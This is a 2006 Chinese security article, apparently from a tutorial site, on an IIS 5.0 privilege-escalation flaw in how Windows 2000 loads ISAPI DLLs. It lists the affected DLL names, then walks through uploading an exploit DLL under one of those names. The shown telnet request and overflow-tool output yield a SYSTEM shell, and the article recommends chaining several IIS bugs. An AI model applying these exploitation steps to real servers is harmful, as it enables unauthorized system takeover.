iis写权限漏洞,IIS提升权限漏洞

IIS提升权限漏洞 - 电脑安全 - 电脑教程网

IIS提升权限漏洞

日期:2006-09-04   荐:
  IIS4默认情况下,应用程序保护选项是"低(共用IIS进程)",所以加载isapi的时候是以加载IIS的身份执行。但WIN2K IIS5.0默认情况下应用程序保护选项是"中(共用的)",这时IIS加载isapi是用的iwam_computername用户身份执行。   但默认情况下WIN2K IIS5对于一些特殊isapi又要以system身份加载。win2k iis5 、win2k iis5 sp1、win2k iis5 sp2都是简单的判断isapi的文件名,并且没有做目录限制,以SYSTEM权限加载的isapi有:   1、 idq.dll   2、 httpext.dll   3、 httpodbc.dll   4、 ssinc.dll   5、 msw3prt.dll   6、 author.dll   7、 admin.dll   8、 shtml.dll   9、 sspifilt.dll   10、compfilt.dll   11、pwsdata.dll   12、md5filt.dll   13、fpexedll.dll   所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug,比如请求/scripts/test乗ssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题,就是"/"、"\"只识别了一个"/",所以如果请求里面使用"\",就会错误的处理包含文件路径,有可能泄露东西或者出现权限漏洞,这种漏洞很多别的地方( php、asp等)也还存在。   但在补了http://www.microsoft.com/technet/security/bulletin/ms01-026.asp 补丁(%二次解码补丁包,包含在sp3)后,加载这些isapi不是单以文件名做依据了,而是加了路径,应该是修正了此问题。   一般默认情况下是:   1、 idq.dll d:\winnt\system32\idq.dll   2、 httpext.dll d:\winnt\system32\inetsrv\httpext.dll   3、 httpodbc.dll d:\winnt\system32\inetsrv\httpodbc.dll   4、 ssinc.dll d:\winnt\system32\inrtsrv\ssinc.dll   5、 msw3prt.dll d:\winnt\system32\msw3prt.dll   6、 author.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll   7、 admin.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll   8、 shtml.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtml.dll   9、 sspifilt.dll d:\winnt\system32\inetsrv\sspifilt.dll   10、compfilt.dll d:\winnt\system32\inetsrv\compfilt.dll   11、pwsdata.dll d:\winnt\system32\inetsrv\pwsdata.dll   12、md5filt.dll d:\winnt\system32\inetsrv\md5filt.dll   13、fpexedll.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll   正常情况下这些路径都guest不能写,所以应该算已经补上。但如果配置不好,这些路径guest能够写了就一样可以提升权限了       win2000的getadmin       把此dll上传到IIS的可执行目录,文件名可叫ssinc.dll或者admin.dll等(上面列的13个文件名之一)。然后使用telnet或者原来的asp.exe。     1、使用telnet。因为这不是专门的客户端,使用参数"?okok"让通信不加密,如果不带这参数将是乱码。     D:\WINNT\temp>telnet 192.168.8.48 80   get /scripts/ssinc.dll?okok   XORDATAMicrosoft Windows 2000 [Version 5.00.2195]   (C) 版权所有 1985-2000 Microsoft Corp.     D:\WINNT\system32>whoami   whoami   NT AUTHORITY\SYSTEM   D:\WINNT\system32>     2、使用asp.exe。同样支持iisput、iisget、iiscmd等命令。   E:\work\asp\Debug>asp 192.168.8.48 /scripts/ssinc.dll     IIS4.0 OVERFLOW PROGRAM 2.0 .   copy by yuange 2000.6.2.   welcome to my homepagehttp://yuange.yeah.net .   welcome tohttp://www.nsfocus.com .   usage: asp [aspfile] [webport] [offset]     nuke ip: 192.168.8.48 port 80   offset:0     shellcode long 0x143c     packetlong:0x1003c     send packet 65634 bytes.   recv:   TRACK / HTTP/1.1   HOST:192.168.8.48     ok!recv 8 bytes     recv:XORDATAMicrosoft Windows 2000 [Version 5.00.2195]   (C) 版权所有 1985-2000 Microsoft Corp.     D:\WINNT\system32>whoami   whoami   NT AUTHORITY\SYSTEM     对于IIS4默认情况下加载ISAPI的DLL都是SYSTEM权限,要得到SYSTEM权限那就根本不是问题。但IIS5默认不是,就需要利用这个提升权限漏洞。这个漏洞照现在公布的,需要有个可写目录供上传利用的dll,因为UNICODE漏洞所以不一定要在虚拟目录,不过默认情况下虚拟可执行目录/scripts可写。   其实结合别的漏洞,根本不需要可写目录,不需要上传DLL,可以利用IIS自身带的一些DLL,利用UNICODE、利用溢出,利用再一个漏洞、加上这个提升权限的漏洞,那就可以一步到位,直接得到system权限。     WINDOWS、IIS等漏洞太多,现在利用IIS漏洞都是玩组合了。像上面说的实际应用中就可以一下利用我们发现的unicode、fpse扩展溢出、截断、提升权限漏洞4个大漏洞。
标签: